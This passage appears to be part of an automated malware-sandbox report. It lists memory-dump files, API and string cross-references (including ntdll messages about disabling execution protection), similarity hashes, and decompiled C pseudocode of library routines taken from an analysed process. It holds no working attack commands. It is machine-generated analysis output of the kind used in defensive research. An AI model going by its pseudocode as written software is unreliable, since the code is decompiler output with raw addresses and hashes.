                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c33f3a
                                                                                                                                                                                                              0x00c33f3b
                                                                                                                                                                                                              0x00c33f53
                                                                                                                                                                                                              0x00c33f64
                                                                                                                                                                                                              0x00c33f69
                                                                                                                                                                                                              0x00c33f6c
                                                                                                                                                                                                              0x00c33f6d
                                                                                                                                                                                                              0x00c33f6f
                                                                                                                                                                                                              0x00c3e304
                                                                                                                                                                                                              0x00c3e30f
                                                                                                                                                                                                              0x00c3e315
                                                                                                                                                                                                              0x00c3e31e
                                                                                                                                                                                                              0x00c3e321
                                                                                                                                                                                                              0x00c3e327
                                                                                                                                                                                                              0x00c3e329
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c3e32f
                                                                                                                                                                                                              0x00c3e32f
                                                                                                                                                                                                              0x00c3e337
                                                                                                                                                                                                              0x00c3e33a
                                                                                                                                                                                                              0x00c3e33b
                                                                                                                                                                                                              0x00c3e33d
                                                                                                                                                                                                              0x00c3e33f
                                                                                                                                                                                                              0x00c3e341
                                                                                                                                                                                                              0x00c3e341
                                                                                                                                                                                                              0x00c3e34e
                                                                                                                                                                                                              0x00c3e353
                                                                                                                                                                                                              0x00c3e358
                                                                                                                                                                                                              0x00c3e35d
                                                                                                                                                                                                              0x00c3e35f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c3e365
                                                                                                                                                                                                              0x00c3e365
                                                                                                                                                                                                              0x00c3e368
                                                                                                                                                                                                              0x00c3e36e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c3e374
                                                                                                                                                                                                              0x00c3e32f
                                                                                                                                                                                                              0x00c33f75
                                                                                                                                                                                                              0x00c33f7a
                                                                                                                                                                                                              0x00c33f7c
                                                                                                                                                                                                              0x00c33f7e
                                                                                                                                                                                                              0x00c33f86
                                                                                                                                                                                                              0x00c17f39
                                                                                                                                                                                                              0x00c17f47
                                                                                                                                                                                                              0x00c17f47
                                                                                                                                                                                                              0x00c17f37
                                                                                                                                                                                                              0x00c17f37
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00C33F12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00C33EC4
                                                                                                                                                                                                              • d}w, xrefs: 00C17F08
                                                                                                                                                                                                              • Execute=1, xrefs: 00C33F5E
                                                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00C3E2FB
                                                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00C3E345
                                                                                                                                                                                                              • ExecuteOptions, xrefs: 00C33F04
                                                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00C33F4A
                                                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00C33F75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$d}w
                                                                                                                                                                                                              • API String ID: 3901378454-2513547028
                                                                                                                                                                                                              • Opcode ID: bf175cfafff62345684e6728ab759e917b2ee690e921eeae62eb7cba370d8e95
                                                                                                                                                                                                              • Instruction ID: a2dcce51c2da1c9bde495fab80a4fb1d6c222ba125b266b02d4eca43eec7cbde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf175cfafff62345684e6728ab759e917b2ee690e921eeae62eb7cba370d8e95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC41A471A8025CBADB209A95DC86FEB73FCAF19700F0045E9B505A6091EB70DF869F61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00C20B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                              				void* _t108;
                                                                                                                                                                                                              				void* _t116;
                                                                                                                                                                                                              				char _t120;
                                                                                                                                                                                                              				short _t121;
                                                                                                                                                                                                              				void* _t128;
                                                                                                                                                                                                              				intOrPtr* _t130;
                                                                                                                                                                                                              				char _t132;
                                                                                                                                                                                                              				short _t133;
                                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                                              				signed int _t156;
                                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                                              				intOrPtr _t177;
                                                                                                                                                                                                              				intOrPtr* _t179;
                                                                                                                                                                                                              				intOrPtr _t180;
                                                                                                                                                                                                              				void* _t183;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t179 = _a4;
                                                                                                                                                                                                              				_t141 =  *_t179;
                                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                              				if(_t141 == 0) {
                                                                                                                                                                                                              					L41:
                                                                                                                                                                                                              					 *_a8 = _t179;
                                                                                                                                                                                                              					_t180 = _v24;
                                                                                                                                                                                                              					if(_t180 != 0) {
                                                                                                                                                                                                              						if(_t180 != 3) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v8 = _v8 + 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t174 = _v32;
                                                                                                                                                                                                              					if(_t174 == 0) {
                                                                                                                                                                                                              						if(_v8 == 7) {
                                                                                                                                                                                                              							goto L43;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L43:
                                                                                                                                                                                                              					if(_v16 != 1) {
                                                                                                                                                                                                              						if(_v16 != 2) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                              						L47:
                                                                                                                                                                                                              						if(_t174 != 0) {
                                                                                                                                                                                                              							E00BF8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                                              							_t116 = 8;
                                                                                                                                                                                                              							E00BEDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t180 != 0) {
                                                                                                                                                                                                              						if(_v12 > 3) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t120 = E00C20CFA(_v28, 0, 0xa);
                                                                                                                                                                                                              						_t183 = _t183 + 0xc;
                                                                                                                                                                                                              						if(_t120 > 0xff) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                                              						goto L47;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v12 > 4) {
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t121 = E00C20CFA(_v28, _t180, 0x10);
                                                                                                                                                                                                              					_t183 = _t183 + 0xc;
                                                                                                                                                                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                                              					goto L47;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						_t123 = _v16;
                                                                                                                                                                                                              						if(_t123 == 0) {
                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t108 = _t123 - 1;
                                                                                                                                                                                                              						if(_t108 != 0) {
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t178 = _t141;
                                                                                                                                                                                                              						if(E00C206BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                                              							if(E00C206BA(_t135, _t178) == 0 || E00C20A5B(_t136, _t178) == 0) {
                                                                                                                                                                                                              								if(_t141 != 0x3a) {
                                                                                                                                                                                                              									if(_t141 == 0x2e) {
                                                                                                                                                                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                                              											goto L41;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_v24 = _v24 + 1;
                                                                                                                                                                                                              											L27:
                                                                                                                                                                                                              											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                              											L28:
                                                                                                                                                                                                              											if(_v28 == 0) {
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t177 = _v24;
                                                                                                                                                                                                              											if(_t177 != 0) {
                                                                                                                                                                                                              												if(_v12 > 3) {
                                                                                                                                                                                                              													L6:
                                                                                                                                                                                                              													return 0xc000000d;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t132 = E00C20CFA(_v28, 0, 0xa);
                                                                                                                                                                                                              												_t183 = _t183 + 0xc;
                                                                                                                                                                                                              												if(_t132 > 0xff) {
                                                                                                                                                                                                              													goto L6;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if(_v12 > 4) {
                                                                                                                                                                                                              												goto L6;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t133 = E00C20CFA(_v28, 0, 0x10);
                                                                                                                                                                                                              											_t183 = _t183 + 0xc;
                                                                                                                                                                                                              											_v20 = _v20 + 1;
                                                                                                                                                                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                                              											goto L20;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t130 = _t179 + 1;
                                                                                                                                                                                                              									if( *_t130 == _t141) {
                                                                                                                                                                                                              										if(_v32 != 0) {
                                                                                                                                                                                                              											goto L41;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_v32 = _v8 + 1;
                                                                                                                                                                                                              										_t156 = 2;
                                                                                                                                                                                                              										_v8 = _v8 + _t156;
                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                              										_t179 = _t130;
                                                                                                                                                                                                              										_v16 = _t156;
                                                                                                                                                                                                              										goto L28;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_v8 = _v8 + 1;
                                                                                                                                                                                                              									goto L27;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v12 = _v12 + 1;
                                                                                                                                                                                                              								if(_v24 > 0) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_a7 = 1;
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_v12 = _v12 + 1;
                                                                                                                                                                                                              							L20:
                                                                                                                                                                                                              							_t179 = _t179 + 1;
                                                                                                                                                                                                              							_t141 =  *_t179;
                                                                                                                                                                                                              							if(_t141 == 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						if(_t141 == 0x3a) {
                                                                                                                                                                                                              							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t130 = _t179 + 1;
                                                                                                                                                                                                              								if( *_t130 != _t141) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v20 = _v20 + 1;
                                                                                                                                                                                                              								_t156 = 2;
                                                                                                                                                                                                              								_v32 = 1;
                                                                                                                                                                                                              								_v8 = _t156;
                                                                                                                                                                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                              						if(_v8 > 7) {
                                                                                                                                                                                                              							goto L41;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t142 = _t141;
                                                                                                                                                                                                              						if(E00C206BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                                              							if(E00C206BA(_t124, _t142) == 0 || E00C20A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t128 = 1;
                                                                                                                                                                                                              								_a7 = 1;
                                                                                                                                                                                                              								_v28 = _t179;
                                                                                                                                                                                                              								_v16 = 1;
                                                                                                                                                                                                              								_v12 = 1;
                                                                                                                                                                                                              								L39:
                                                                                                                                                                                                              								if(_v16 == _t128) {
                                                                                                                                                                                                              									goto L20;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_a7 = 0;
                                                                                                                                                                                                              							_v28 = _t179;
                                                                                                                                                                                                              							_v16 = 1;
                                                                                                                                                                                                              							_v12 = 1;
                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L1:
                                                                                                                                                                                                              				_t123 = _t108 == 1;
                                                                                                                                                                                                              				if(_t108 == 1) {
                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t128 = 1;
                                                                                                                                                                                                              				goto L39;
                                                                                                                                                                                                              			}

























                                                                                                                                                                                                              0x00c20b21
                                                                                                                                                                                                              0x00c20b24
                                                                                                                                                                                                              0x00c20b27
                                                                                                                                                                                                              0x00c20b2a
                                                                                                                                                                                                              0x00c20b2d
                                                                                                                                                                                                              0x00c20b30
                                                                                                                                                                                                              0x00c20b33
                                                                                                                                                                                                              0x00c20b36
                                                                                                                                                                                                              0x00c20b39
                                                                                                                                                                                                              0x00c20b3e
                                                                                                                                                                                                              0x00c20c65
                                                                                                                                                                                                              0x00c20c68
                                                                                                                                                                                                              0x00c20c6a
                                                                                                                                                                                                              0x00c20c6f
                                                                                                                                                                                                              0x00c4eb42
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb48
                                                                                                                                                                                                              0x00c4eb48
                                                                                                                                                                                                              0x00c20c75
                                                                                                                                                                                                              0x00c20c7a
                                                                                                                                                                                                              0x00c4eb54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb5a
                                                                                                                                                                                                              0x00c20c80
                                                                                                                                                                                                              0x00c20c84
                                                                                                                                                                                                              0x00c4eb98
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eba6
                                                                                                                                                                                                              0x00c20cb8
                                                                                                                                                                                                              0x00c20cba
                                                                                                                                                                                                              0x00c20cd3
                                                                                                                                                                                                              0x00c20cda
                                                                                                                                                                                                              0x00c20ce4
                                                                                                                                                                                                              0x00c20ce9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20cec
                                                                                                                                                                                                              0x00c20c8c
                                                                                                                                                                                                              0x00c4eb63
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb70
                                                                                                                                                                                                              0x00c4eb75
                                                                                                                                                                                                              0x00c4eb7d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb8c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb8c
                                                                                                                                                                                                              0x00c20c96
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20ca2
                                                                                                                                                                                                              0x00c20cac
                                                                                                                                                                                                              0x00c20cb4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b44
                                                                                                                                                                                                              0x00c20b47
                                                                                                                                                                                                              0x00c20b49
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b4f
                                                                                                                                                                                                              0x00c20b50
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b56
                                                                                                                                                                                                              0x00c20b62
                                                                                                                                                                                                              0x00c20b7c
                                                                                                                                                                                                              0x00c20bac
                                                                                                                                                                                                              0x00c20a0f
                                                                                                                                                                                                              0x00c4eaaa
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eac4
                                                                                                                                                                                                              0x00c4eac4
                                                                                                                                                                                                              0x00c20bd0
                                                                                                                                                                                                              0x00c20bd0
                                                                                                                                                                                                              0x00c20bd4
                                                                                                                                                                                                              0x00c20bd9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20bdb
                                                                                                                                                                                                              0x00c20be0
                                                                                                                                                                                                              0x00c4eb0e
                                                                                                                                                                                                              0x00c20a1a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20a1a
                                                                                                                                                                                                              0x00c4eb1a
                                                                                                                                                                                                              0x00c4eb1f
                                                                                                                                                                                                              0x00c4eb27
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb36
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb36
                                                                                                                                                                                                              0x00c20bea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20bf6
                                                                                                                                                                                                              0x00c20c00
                                                                                                                                                                                                              0x00c20c03
                                                                                                                                                                                                              0x00c20c0b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20c0b
                                                                                                                                                                                                              0x00c4eaaa
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20a15
                                                                                                                                                                                                              0x00c20bb6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20bc6
                                                                                                                                                                                                              0x00c20bc6
                                                                                                                                                                                                              0x00c20bcb
                                                                                                                                                                                                              0x00c20c15
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20c1d
                                                                                                                                                                                                              0x00c20c20
                                                                                                                                                                                                              0x00c20c21
                                                                                                                                                                                                              0x00c20c24
                                                                                                                                                                                                              0x00c20c24
                                                                                                                                                                                                              0x00c20c26
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20c26
                                                                                                                                                                                                              0x00c20bcd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20bcd
                                                                                                                                                                                                              0x00c20b89
                                                                                                                                                                                                              0x00c20b89
                                                                                                                                                                                                              0x00c20b90
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b96
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b96
                                                                                                                                                                                                              0x00c20a04
                                                                                                                                                                                                              0x00c20a04
                                                                                                                                                                                                              0x00c20b9a
                                                                                                                                                                                                              0x00c20b9a
                                                                                                                                                                                                              0x00c20b9b
                                                                                                                                                                                                              0x00c20b9f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20ba5
                                                                                                                                                                                                              0x00c20ac7
                                                                                                                                                                                                              0x00c20aca
                                                                                                                                                                                                              0x00c4eacf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eade
                                                                                                                                                                                                              0x00c4eade
                                                                                                                                                                                                              0x00c4eae3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eaf3
                                                                                                                                                                                                              0x00c4eaf6
                                                                                                                                                                                                              0x00c4eaf7
                                                                                                                                                                                                              0x00c4eafe
                                                                                                                                                                                                              0x00c4eb01
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eb01
                                                                                                                                                                                                              0x00c4eacf
                                                                                                                                                                                                              0x00c20ad0
                                                                                                                                                                                                              0x00c20ad4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20ada
                                                                                                                                                                                                              0x00c20ae6
                                                                                                                                                                                                              0x00c20c34
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20c47
                                                                                                                                                                                                              0x00c20c49
                                                                                                                                                                                                              0x00c20c4a
                                                                                                                                                                                                              0x00c20c4e
                                                                                                                                                                                                              0x00c20c51
                                                                                                                                                                                                              0x00c20c54
                                                                                                                                                                                                              0x00c20c57
                                                                                                                                                                                                              0x00c20c5a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20c60
                                                                                                                                                                                                              0x00c20afb
                                                                                                                                                                                                              0x00c20afe
                                                                                                                                                                                                              0x00c20b02
                                                                                                                                                                                                              0x00c20b05
                                                                                                                                                                                                              0x00c20b08
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20b08
                                                                                                                                                                                                              0x00c20ae6
                                                                                                                                                                                                              0x00c20b44
                                                                                                                                                                                                              0x00c209f8
                                                                                                                                                                                                              0x00c209f8
                                                                                                                                                                                                              0x00c209f9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4eaa0
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                              • Instruction ID: ec4bd21a43e5de472c8902048fb1488b18248d1aff0c1cd075d9a8ebdff85128
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8A18DB190032ADFCB24CF68E8456BEB7B5BF45304F34856BD852A7A43D6309A41DB52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                              			E00C20554(signed int _a4, char _a8) {
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int* _t49;
                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                              				signed int _t56;
                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                              				signed int _t63;
                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                              				signed int _t107;
                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                                              				signed int* _t119;
                                                                                                                                                                                                              				void* _t125;
                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                              				signed int _t128;
                                                                                                                                                                                                              				signed int _t130;
                                                                                                                                                                                                              				signed int _t138;
                                                                                                                                                                                                              				signed int _t144;
                                                                                                                                                                                                              				void* _t158;
                                                                                                                                                                                                              				void* _t159;
                                                                                                                                                                                                              				void* _t160;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t96 = _a4;
                                                                                                                                                                                                              				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                              				_push(_t138);
                                                                                                                                                                                                              				if(_t115 < 0) {
                                                                                                                                                                                                              					_t105 =  *[fs:0x18];
                                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                                                              						asm("lock xadd [eax], edx");
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                              					_push(_t128);
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                              						if(_t115 >= 0) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _a8;
                                                                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              							_t49 = _t96 + 0x1c;
                                                                                                                                                                                                              							_t106 = 1;
                                                                                                                                                                                                              							asm("lock xadd [edx], ecx");
                                                                                                                                                                                                              							_t115 =  *(_t96 + 0x28);
